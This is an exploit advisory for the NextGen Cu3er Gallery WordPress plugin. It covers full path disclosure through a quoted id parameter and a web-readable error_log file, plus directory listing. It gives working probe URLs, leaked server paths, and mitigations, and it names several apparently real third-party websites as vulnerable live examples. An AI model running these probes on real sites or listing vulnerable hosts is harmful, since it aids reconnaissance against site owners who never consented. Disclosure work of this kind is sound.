# >> Exploit database separated by exploit type (local, remote, DoS, etc.)
#
# [x] Official Website: http://www.1337day.com
# [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com
#
# ==========================================
# I'm Dark-Puzzle From Inj3ct0r TEAM
# dark-puzzle[at]live[at]fr
# ==========================================
# White Hat
# Independent Pentester
# exploit coder/bug researcher
#
# Exploit Title: WordPress plugins - NextGen Cu3er Gallery Multiple Vulnerabilities .
# Date: 31 August 2012
# Author: Dark-Puzzle (Souhail Hammou)
# Risk : Medium
# Version: All Versions
# Google Dork : N/A
# Category: Webapps/0day
# Tested on: Windows Xp Sp2 Fr .
# Gr337ings to : Inj3ct0r Team - Packetstormsecurity.org - Securityfocus.com - Jigsaw - Dark-Soldier ...
----------------------------------------------------
I - Multiple Full Path Disclosure Vulnerabilities :
----------------------------------------------------

***********************************
1.1 - Using XML Parsing Error
***********************************

Normal request :
http://www.example.com/PATH/nextgen-cu3er-gallery/xml/xml_made_by_me.php?id=2

Exploitation :
http://www.example.com/PATH/nextgen-cu3er-gallery/xml/xml_made_by_me.php?id='2'

Quoting the id value makes the script fail. On servers that display PHP errors, the resulting warning is printed into the XML response (which the browser then reports as an XML parsing error) and it contains the full filesystem path of the script.

Live Examples =
http://interactivemind.eu/wp-content/plugins/nextgen-cu3er-gallery/xml/xml_made_by_me.php?id='2'
http://canadachalet.com/nantel/wp-content/plugins/nextgen-cu3er-gallery/xml/cu3er.php?id='1'
http://www.sansexception.eu/wp-content/plugins/nextgen-cu3er-gallery/xml/cu3er.php?id='12'

************************************
1.2 - Displaying error_log file
************************************

When the first method does not work, no error is shown in the browser, so the full path cannot be retrieved that way. The error still occurs, however, and it is written to an error_log file that is stored inside the plugin directory and can be fetched over HTTP.

Example :
http://www.entre-chiens-et-chats-agadir.com/wp-content/plugins/nextgen-cu3er-gallery/xml/cu3er.php?id='1'

No error is visible in the response, but the error_log in the same directory :
http://www.entre-chiens-et-chats-agadir.com/wp-content/plugins/nextgen-cu3er-gallery/xml/error_log
contains, at the end of the file, the following entries .
[31-Aug-2012 11:11:31] PHP Warning: shuffle() expects parameter 1 to be array, string given in /home1/entrechi/public_html/wp-content/plugins/nextgen-cu3er-gallery/xml/cu3er.php on line 86
[31-Aug-2012 11:11:31] PHP Warning: Invalid argument supplied for foreach() in /home1/entrechi/public_html/wp-content/plugins/nextgen-cu3er-gallery/xml/cu3er.php on line 87

The Full path : /home1/entrechi/public_html/wp-content/plugins/nextgen-cu3er-gallery/xml/cu3er.php

Other Example Sites :
http://www.interactivemind.ro/wp-content/plugins/nextgen-cu3er-gallery/xml/error_log
http://trafficflo.net/blog/wp-content/plugins/nextgen-cu3er-gallery/error_log
http://interactivemind.eu/wp-content/plugins/nextgen-cu3er-gallery/error_log
http://interactivemind.eu/wp-content/plugins/nextgen-cu3er-gallery/xml/error_log

Mitigation : validate the id parameter as an integer before it is used, set display_errors to Off, and keep the PHP error_log outside the web root (or deny HTTP access to it) so that visitors cannot read the warnings.

--------------------------------------------------
II - Directory listing Vulnerability :
-------------------------------------------------

Where the web server has directory indexing enabled, the contents of the following plugin directories are listed :

---> wp-content/plugins/nextgen-cu3er-gallery/xml/ ( may contain a .listing file, which is the output of an ls -lah command )
---> wp-content/plugins/nextgen-cu3er-gallery

Examples :
http://sanabeltrading.biz/wp-content/plugins/nextgen-cu3er-gallery/
http://www.tvmcgill.com/wordpress/wp-content/plugins/nextgen-cu3er-gallery/xml/
http://www.mjrgrp.com/demo/santa/wp-content/plugins/nextgen-cu3er-gallery/xml/

Mitigation : disable directory indexing for the plugin directories (for example Options -Indexes on Apache) or place an empty index file in each of them, and remove stray files such as .listing and error_log.

# Datasec Team